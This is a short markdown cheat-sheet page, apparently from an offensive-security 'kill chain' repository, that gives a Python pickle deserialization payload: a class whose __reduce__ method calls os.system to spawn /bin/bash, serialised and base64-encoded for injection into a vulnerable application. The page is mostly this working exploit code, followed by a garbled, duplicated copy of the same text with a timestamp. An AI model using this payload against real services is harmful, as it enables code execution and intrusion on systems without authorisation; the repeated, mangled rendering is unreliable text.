killchain-compendium/exploit/python/pickle.md

# Pickle

## Payload
* Inject payload  
```python
import pickle
import os
import base64
class evil_object(object):
    def __reduce__(self):
        return(os.system, ('/bin/bash',))
x = evil_object()
x = evil_object()
y = pickle.dumps(x)
base64.b64encode(y)
```
pickle 2021-12-04 00:26:03 +01:00			`# Pickle`

			`## Payload`
			`* Inject payload`
			```python
			`import pickle`
			`import os`
			`import base64`
			`class evil_object(object):`
			`def __reduce__(self):`
			`return(os.system, ('/bin/bash',))`
			`x = evil_object()`
			`x = evil_object()`
			`y = pickle.dumps(x)`
			`base64.b64encode(y)`
			```